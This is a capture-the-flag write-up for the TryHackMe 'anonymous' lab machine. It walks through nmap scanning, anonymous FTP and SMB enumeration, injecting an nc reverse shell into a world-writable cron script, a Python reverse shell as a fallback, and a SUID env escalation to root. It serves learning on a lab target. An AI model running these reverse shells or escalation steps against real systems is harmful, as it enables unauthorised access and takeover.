This is my writeup for the anonymous room/machine of TryHackMe.com platform. Remember this is just how I solved/owned the machine, maybe there are different and fast paths but…
Machine
Not the hacking group
The machine is called anonymous, room anomymous, the link is https://tryhackme.com/room/anonymous. This is rated as a medium machine but honestly is more an easy one!
With this machine you can refresh privilege escalation and how to gain power using an anonymous ftp server. Remember the IP is changing every time…
Recon
First of all I run a classic nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
nmap -sC -sV -p- 10.10.23.85
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 05:45 EST
Nmap scan report for 10.10.23.85
Host is up (0.028s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.11.55.171
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-01-19T10:46:15
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2022-01-19T10:46:15+00:00
|
I’m looking at a Linux machine with the four ports open: 21,22,139 and 445.
First of all I check the FTP server as anonymous user (and pass)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
ftp 10.10.23.85
Connected to 10.10.23.85.
220 NamelessOne's FTP Server!
Name (10.10.23.85:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||21306|)
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||62989|)
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 946 Jan 19 10:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
|
There are three files and it seems I’m able to write/overwrite (-rwxr-xrwx) the file named clean.sh. I download them
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
ftp> get clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||8708|)
150 Opening BINARY mode data connection for clean.sh (314 bytes).
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
229 Entering Extended Passive Mode (|||34003|)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
229 Entering Extended Passive Mode (|||61253|)
ftp> quit
221 Goodbye.
|
and check:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
cat clean.sh
#!/bin/bash
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
cat removed_files.log
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
...
Running cleanup script: nothing to delete
Running cleanup script: nothing to delete
cat to_do.txt
I really need to disable the anonymous login...it's really not safe
|
The to_do.txt file is just a memo, the clean.sh is a bash script who just execute the first then and write a new row each time on the log file (removed_files.log)
If I check the timestamp on the FTP server I notice that every minute the log file change last date (last writing one), it means every minute the script is running and there is - probably - a cron job.
Let’s check the SMB server
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
smbclient -L //10.10.23.85
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
smbclient //10.10.23.85/pics -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun May 17 07:11:34 2020
.. D 0 Wed May 13 21:59:10 2020
corgo2.jpg N 42663 Mon May 11 20:43:42 2020
puppos.jpeg N 265188 Mon May 11 20:43:42 2020
20508240 blocks of size 1024. 13306824 blocks available
smb: \> get puppos.jpeg
getting file \puppos.jpeg of size 265188 as puppos.jpeg (787.2 KiloBytes/sec) (average 787.2 KiloBytes/sec)
smb: \> get corgo2.jpg
getting file \corgo2.jpg of size 42663 as corgo2.jpg (145.7 KiloBytes/sec) (average 488.8 KiloBytes/sec)
smb: \>
|
The service is an anonymous one and it contains just two images into the “pics” folder. Nothing really usable for our pourpose.
I’m able to write into the FTP server folder, I know (or I suspect…better) a cron job is running the script clean.sh every minute. The idea is modifying the script, adding a reverse shell and obtaining access as user.
First of all I start a netcat listener on my kali and I modify the script, adding a reverse shell at the top
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
vi clean.sh
#!/bin/bash
# the reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.55.171 4444>/tmp/f
####################
tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
|
and I upload the newe clean.sh into the FTP server
1
2
3
4
5
|
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||23628|)
150 Ok to send data.
226 Transfer complete.
|
In less than a minute a shell will appears
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.11.55.171] from (UNKNOWN) [10.10.23.85] 54802
/bin/sh: 0: can't access tty; job control turned off
$ ls
pics
user.txt
$ cat user.txt
-----REDACTED----
$ python -c 'import pty; pty.spawn("/bin/bash")'
namelessone@anonymous:~$
namelessone@anonymous:~$ crontab -l
crontab -l
...
* * * * * /var/ftp/scripts/clean.sh
namelessone@anonymous:~$ id
uid=1000(namelessone) gid=1000(namelessone) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
|
Tip
Sometimes the reverse shell used is not working. If not use a reverse shell in python
1
|
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.55.171",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
|
just add it instead of the other one.
Privilege Escalation
I run a check to find if some executable have the SUID bit set and if this executable is exploitable:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
namelessone@anonymous:~$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
66 40 -rwsr-xr-x 1 root root 40152 Oct 10 2019 /snap/core/8268/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/8268/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/8268/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/8268/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Oct 10 2019 /snap/core/8268/bin/umount
2665 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/8268/usr/bin/chfn
2667 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/8268/usr/bin/chsh
2743 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/8268/usr/bin/gpasswd
2835 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/8268/usr/bin/newgrp
2848 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/8268/usr/bin/passwd
2958 134 -rwsr-xr-x 1 root root 136808 Oct 11 2019 /snap/core/8268/usr/bin/sudo
3057 42 -rwsr-xr-- 1 root systemd-resolve 42992 Jun 10 2019 /snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3427 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/8268/usr/lib/openssh/ssh-keysign
6462 105 -rwsr-sr-x 1 root root 106696 Dec 6 2019 /snap/core/8268/usr/lib/snapd/snap-confine
7636 386 -rwsr-xr-- 1 root dip 394984 Jun 12 2018 /snap/core/8268/usr/sbin/pppd
66 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /snap/core/9066/bin/mount
80 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /snap/core/9066/bin/ping
81 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /snap/core/9066/bin/ping6
98 40 -rwsr-xr-x 1 root root 40128 Mar 25 2019 /snap/core/9066/bin/su
116 27 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /snap/core/9066/bin/umount
2670 71 -rwsr-xr-x 1 root root 71824 Mar 25 2019 /snap/core/9066/usr/bin/chfn
2672 40 -rwsr-xr-x 1 root root 40432 Mar 25 2019 /snap/core/9066/usr/bin/chsh
2748 74 -rwsr-xr-x 1 root root 75304 Mar 25 2019 /snap/core/9066/usr/bin/gpasswd
2840 39 -rwsr-xr-x 1 root root 39904 Mar 25 2019 /snap/core/9066/usr/bin/newgrp
2853 53 -rwsr-xr-x 1 root root 54256 Mar 25 2019 /snap/core/9066/usr/bin/passwd
2963 134 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /snap/core/9066/usr/bin/sudo
3062 42 -rwsr-xr-- 1 root systemd-resolve 42992 Nov 29 2019 /snap/core/9066/usr/lib/dbus-1.0/dbus-daemon-launch-helper
3432 419 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /snap/core/9066/usr/lib/openssh/ssh-keysign
6470 109 -rwsr-xr-x 1 root root 110792 Apr 10 2020 /snap/core/9066/usr/lib/snapd/snap-confine
7646 386 -rwsr-xr-- 1 root dip 394984 Feb 11 2020 /snap/core/9066/usr/sbin/pppd
131150 28 -rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
131140 32 -rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
131191 64 -rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
131084 44 -rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
131207 44 -rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
1050325 100 -rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
919490 44 -rwsr-xr-- 1 root messagebus 42992 Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
923989 108 -rwsr-sr-x 1 root root 109432 Oct 30 2019 /usr/lib/snapd/snap-confine
919683 16 -rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
919497 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
919679 428 -rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
919144 60 -rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
918992 36 -rwsr-xr-x 1 root root 35000 Jan 18 2018 /usr/bin/env
919017 76 -rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
919128 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
919127 40 -rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
918924 44 -rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
919126 40 -rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
918922 76 -rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
919269 148 -rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
919305 20 -rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
918871 52 -rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
919164 24 -rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
|
The binary env have the SUID set, according to GTFOBins is exploitable…let’s try
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
namelessone@anonymous:/etc$ /usr/bin/env /bin/sh -p
/usr/bin/env /bin/sh -p
# id
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
# cd /root
cd /root
# ls -ltra
ls -ltra
total 60
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 May 11 2020 .ssh
lrwxrwxrwx 1 root root 9 May 11 2020 .bash_history -> /dev/null
drwx------ 3 root root 4096 May 11 2020 .gnupg
drwx------ 2 root root 4096 May 11 2020 .cache
-rw-r--r-- 1 root root 33 May 11 2020 root.txt
-rw-r--r-- 1 root root 66 May 11 2020 .selected_editor
drwxr-xr-x 3 root root 4096 May 11 2020 .local
drwxr-xr-x 24 root root 4096 May 12 2020 ..
-rw------- 1 root root 55 May 14 2020 .Xauthority
-rw------- 1 root root 13795 May 17 2020 .viminfo
drwx------ 6 root root 4096 May 17 2020 .
# cat root.txt
cat root.txt
----REDACTED----
|
Oh yes, it was usable and became into the euid (Effective User ID) root. Machine owned.